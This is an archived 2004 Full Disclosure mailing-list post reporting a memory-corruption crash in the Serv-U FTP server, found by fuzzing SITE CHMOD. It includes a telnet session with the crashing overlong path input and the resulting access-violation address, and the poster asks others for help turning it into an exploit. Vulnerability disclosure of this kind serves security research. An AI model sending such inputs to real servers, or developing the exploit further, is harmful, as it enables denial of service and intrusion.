Full Disclosure mailing list archives

Serv-U 4.1 Memory Corruption / Whatever

From: Some Guy <maillist () bastart eu org>
Date: Mon, 16 Feb 2004 22:36:14 +0100

Well, I didn't have the time to fully analyze it yet, but by using a fuzzer to check Serv-U, I found something that crashed it using bad data in SITE CHMOD. This is not the already discovered vulnerability, cause it can be used without write access, the crash occurs before permissions are even checked. Seems like an off-by-two, cause you can control 2 bytes of a dword where your buffer gets written, but I wasn't able to find how the other 2 bytes are controlled yet, and I wasn't able to do anything useful with the 2 bytes I have cause they can't be NULL. Well, I hope someone can enlighten me a little, cause I tried the last 2 days and now I'm out of ideas.

hello@proxy:~# telnet ftp.target.com 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER myuser
331 User name okay, need password.
PASS mypass
230 User logged in, proceed.
SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Connection closed by foreign host.
hello@proxy:~#

this will cause this an ccess violation writing to 0x555551AD (UUQ-)

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html